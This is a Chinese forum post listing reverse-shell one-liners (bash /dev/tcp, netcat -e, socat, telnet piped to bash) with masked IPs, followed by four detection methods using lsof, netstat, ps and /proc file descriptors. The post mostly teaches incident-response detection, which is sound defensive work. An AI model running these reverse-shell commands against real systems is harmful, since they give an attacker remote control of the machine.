村长 发表于 2022-11-14 08:17:36

【NB团队】反弹shell与检测方法

前言
前面帖子写了微信小程序漏洞挖掘,当中使用了反弹shell,那么这个帖子就来写一下反弹shell和检测方法吧。

因为我们在渗透测试的时候,我们经常会用到反弹shell,去进行一个后续的利用,今天在防守的角度,去查看一下如何分析反弹shell的检测,在应急响应,分析攻击手法的时候,也会使用到。

正文
这里先来列举一下反弹shell的各种形式。

1.bash反弹shell
bash -i >& /dev/tcp/xxx.xxx.xxx.xxxx/xxx 0>&1

2.netcat反弹shell
netcat xx.xxx.xxx.x xxxx -e /bin/bash# nc   -e /bin/bash

3.Socat反弹shell
socat tcp-connect:xxx.xxx.xxx.xxx:xxxx exec:'bash -li',pty,stderr,setsid,sigint,sane

4.telnet反弹shell(楼主常用)
telnet xx.xxx.xxx.xxx xxxx | /bin/bash | telnet xxx.xx.xxx.xxx xxxx

关于反弹shell的方式还是有很多的,这里不列举过多。

第一种检测的方式:
通过lsof进行检测
lsof -n | grep ESTABLISHED |grep -E '0u|1u|2u'
反弹SHELL的本质就是0 1 2文件描述符的重定向,因此检测0 1 2文件描述符有没有重定向到远端地址就可以大致判断是否使用了反弹SHELL
(如列图2)

第二种检测方式:
netstat -anop|grep ESTABLISHED
这里是查看有无bash/sh连接到远端地址
(如列图3)

第三种检测方法,直接通过ps -ef,查看有无反弹shell的常见命令。
(如列图4)

第四种检测方式,通过ls -al /proc/xxx/fd,通过查看fd,有无连接到远端地址,这里有些时候会用到pipe来执行命令,需要继续跟踪pipe.
(如列图5)
http://cdn.u1.huluxia.com/g4/M02/E1/B5/rBAAdmNrHgSAFszLAACMTq_yl2Y960.pnghttp://cdn.u1.huluxia.com/g4/M02/E1/B5/rBAAdmNrHgSAU9xgAAAeHZw7_So617.pnghttp://cdn.u1.huluxia.com/g4/M02/E1/B5/rBAAdmNrHgWAP4dmAAAS11ykzMk334.pnghttp://cdn.u1.huluxia.com/g4/M02/E1/B5/rBAAdmNrHgWAByH5AAEK6v0LhVg382.pnghttp://cdn.u1.huluxia.com/g4/M02/E1/B5/rBAAdmNrHgaALN6DAAG2FI2JkEI422.png
页: [1]
查看完整版本: 【NB团队】反弹shell与检测方法

村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科
技平台参与或发布项目定制各种软件就来村长黑科技平台

本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。本站所发布的任何软件的破解分析文章、破解分析视频、补丁、注册机和注册信息,

仅限用于学习和研究软件安全的目的。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。学习破解分析技术是为了更好的完善软件可能存在的不安全因素,提升软件安全意识。所以您如果喜欢某程序,

请购买注册正版软件,获得正版优质服务!不允许将上述内容私自传播、销售或者其他任何非法用途!否则,产生任何法律责任,一切后果请用户自负,与本网站无关!如有侵权或非法用途请举报!请发送到邮箱:cxphj8@foxmail.com

《意见反馈》或《截图指定页面备注》发送到邮件,收到后24小时内删除,禁止用户学习使用关掉用户【学习使用权】!